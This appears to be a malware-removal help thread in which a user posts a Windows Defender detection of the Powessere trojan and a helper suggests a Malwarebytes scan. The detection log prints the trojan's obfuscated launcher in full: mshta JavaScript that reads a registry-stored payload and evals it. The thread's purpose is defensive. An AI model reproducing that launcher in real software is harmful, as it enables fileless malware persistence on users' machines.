Persistant Trojan:Win32/Powessere.H

CainPDX

CainPDX

New Member
Thread author
Mar 4, 2018
3
Event Viewer gave this information on Event 1116 which is one of many similar events that occur each time I turn on my computer:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Trojan:Win32/Powessere.H threat description - Windows Defender Security Intelligence
Name: Trojan:Win32/Powessere.H
ID: 2147726088
Severity: Severe
Category: Trojan
Path: CmdLine:_\Device\HarddiskVolume3\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C start "" mshta.exe "javascript:np8si="wPk";U5s=new ActiveXObject("WScript.Shell");DY3YUb4="cf0QT2cs";ht9kH1=U5s.RegRead("HKCU\\software\\eewn\\jmvryxenjm");B9OL8lS="v3R7";eval(ht9kH1);yod1qRHe="najkzw5";";CmdLine:_\Device\HarddiskVolume3\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C start "" mshta.exe "javascript:p1ytp3UQ="OsEleDvM";T9w9=new ActiveXObject("WScript.Shell");jqZ5p="z85p";O1w2wW=T9w9.RegRead("HKCU\\software\\eewn\\jmvryxenjm");W0kFQ0aRP="Moquky";eval(O1w2wW);yevFGLg7="TNvL";";CmdLine:_\Device\HarddiskVolume3\Windows\System32\mshta.exe "mshta.exe" "javascript:HIYtYH1X="BbcyJUP";rs47=new ActiveXObject("WScript.Shell");iM5UN9Ac="X";mYgT0=rs47.RegRead("HKCU\\software\\eewn\\jmvryxenjm");S1Slz="ZtF9r";eval(mYgT0);RuWi9="jbZ8qk";"
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
User: NT AUTHORITY\SYSTEM
Process Name: Unknown
Signature Version: AV: 1.263.119.0, AS: 1.263.119.0, NIS: 118.2.0.0
Engine Version: AM: 1.1.14600.4, NIS: 2.1.14202.0
 

Attachments

  • FRST.txt
    85 KB · Views: 4
  • Addition.txt
    42.2 KB · Views: 5
CainPDX

CainPDX

New Member
Thread author
Mar 4, 2018
3
And by the way, Thanx a lot for providing this kind of help for home computer kibitzers like myself. You're GREAT!
 
TwinHeadedEagle

TwinHeadedEagle

Level 41
Verified
Mar 8, 2013
22,627
Hello,


51a46ae42d560-malwarebytes_anti_malware.png
Scan with Malwarebytes' Anti-Malware

Please download Malwarebytes Anti-Malware and save it to your desktop.
  • Install the progam.
  • Click the Scan tab, choose Threat Scan is checked and click Start Scan.
  • If threats are detected, click the Quarantine Selected button. You will now be prompted to reboot. Click Yes.
  • Upon completion of the scan (or after the reboot), click the Reports tab.
  • Double-click the Scan Log.
  • At the bottom click Export and choose Text file.
Save the file to your desktop and include its content in your next reply.
 
CainPDX

CainPDX

New Member
Thread author
Mar 4, 2018
3
I appreciate your suggestions. I downloaded and ran the Malwarebytes scan. There were 614 problem files including several rootkit programs. I've attached the log file. Is there anything else I need to do?
 

Attachments

  • MWB Scan log 3-9-18.txt
    113.9 KB · Views: 7

Similar threads

K
  • Locked
PowerShell/MaleficAms Powershell Infection Please Help
Replies
2
Views
2,506
Windows Malware Removal Help & Support
nasdaq
nasdaq
M
    • Like
Threat actors misusing Quick Assist in social engineering attacks leading to ransomware
Replies
0
Views
432
Microsoft Defender
Microsoft Threat Intelligence
M
M
    • Like
Analyzing Forest Blizzard’s custom post-compromise tool for exploiting CVE-2022-38028 to obtain credentials
Replies
0
Views
702
Microsoft Defender
Microsoft Threat Intelligence
M

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

Quick Navigation

Forum Rules Warning System Welcome Guide Two-factor Authentication

User Menu

Login

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top